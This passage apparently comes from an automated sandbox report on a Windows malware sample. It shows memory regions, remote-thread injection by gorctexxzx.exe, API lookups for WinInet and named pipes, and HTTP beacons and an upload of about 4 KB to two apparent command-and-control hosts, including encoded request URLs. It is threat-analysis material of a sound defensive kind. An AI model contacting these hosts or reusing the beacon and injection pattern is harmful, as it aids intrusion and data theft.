| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50000, size = 14348 |
|
1 | |
| Create Remote Thread | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50202 |
|
1 |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | - | size = 65535 |
|
3 |
Module (55)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | WinInet.dll | base_address = 0x76600000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x77830000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = realloc, address_out = 0x7772b10d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = sprintf, address_out = 0x7773d354 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = srand, address_out = 0x7772f757 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = rand, address_out = 0x7772c070 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnprintf, address_out = 0x7772d1a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strtok, address_out = 0x7772df1f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strcmp, address_out = 0x77738b11 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeW, address_out = 0x7620270f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x7621cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetNamedPipeHandleState, address_out = 0x7622f420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x7621bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOverlappedResult, address_out = 0x76212f04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ConnectNamedPipe, address_out = 0x76202727 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76207f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x7622f438 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenEventW, address_out = 0x7621548b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7621bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x7621ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x7622214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x7621bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x7620eb36 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestExA, address_out = 0x76691812 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpQueryInfoA, address_out = 0x7661a33e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectA, address_out = 0x766249e9 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7661b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetWriteFile, address_out = 0x766346da |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestA, address_out = 0x76624c7d |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpEndRequestA, address_out = 0x766345ea |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7661dcd2 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestA, address_out = 0x766918f8 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenA, address_out = 0x7662f18e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7661ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetQueryOptionA, address_out = 0x76611b56 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetSetOptionA, address_out = 0x766175e8 |
|
1 | |
| Get Address | c:\windows\system32\urlmon.dll | function = ObtainUserAgentString, address_out = 0x77861d76 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:07:44 (UTC) |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 977 bytes |
| Total Data Received | 4.40 KB |
| Contacted Host Count | 2 |
| Contacted Hosts | webonline.mefound.com, easport-news.publicvm.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | webonline.mefound.com |
| Server Port | 0 |
| Data Sent | 451 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = webonline.mefound.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = index/index.php?h=OjoH51%2feH88%3d&d=OjoCBOTAiM86OwjWaegu%2bgIIMtBv7S%2f7CgoH51%2feH886OgfnX95%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Accept: */* |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = webonline.mefound.com/index/index.php?h=OjoH51%2feH88%3d&d=OjoCBOTAiM86OwjWaegu%2bgIIMtBv7S%2f7CgoH51%2feH886OgfnX95%3d |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | easport-news.publicvm.com |
| Server Port | 0 |
| Data Sent | 526 |
| Data Received | 4498 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = easport-news.publicvm.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = index/index.php?h=TqFIohTtxkA%3d&d=TKFNQa%2fzUUBOoEeTItv3dXaTfZUk3vZ0fpFIohTtxkBOoUiiFO33dniQfZom2PFwfZF8kiSp93V%2blHyRJtT2dGDLOMU0zeZgboFogjTN5mBugWiCNM3mYM%3d%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Content-Type: multipart/form-data; boundary=---------------------------69082cd2724bf9 |
|
1 | |
| Send HTTP Request | url = easport-news.publicvm.com/index/index.php?h=TqFIohTtxkA%3d&d=TKFNQa%2fzUUBOoEeTItv3dXaTfZUk3vZ0fpFIohTtxkBOoUiiFO33dniQfZom2PFwfZF8kiSp93V%2blHyRJtT2dGDLOMU0zeZgboFogjTN5mBugWiCNM3mYM%3d%3d |
|
1 | |
| Add HTTP Request Data | size = 133, size_out = 133 |
|
1 | |
| Add HTTP Request Data | size = 4004, size_out = 4004 |
|
1 | |
| Add HTTP Request Data | size = 49, size_out = 49 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 16384, size_out = 304 |
|
1 | |
| Read Response | size = 16384, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
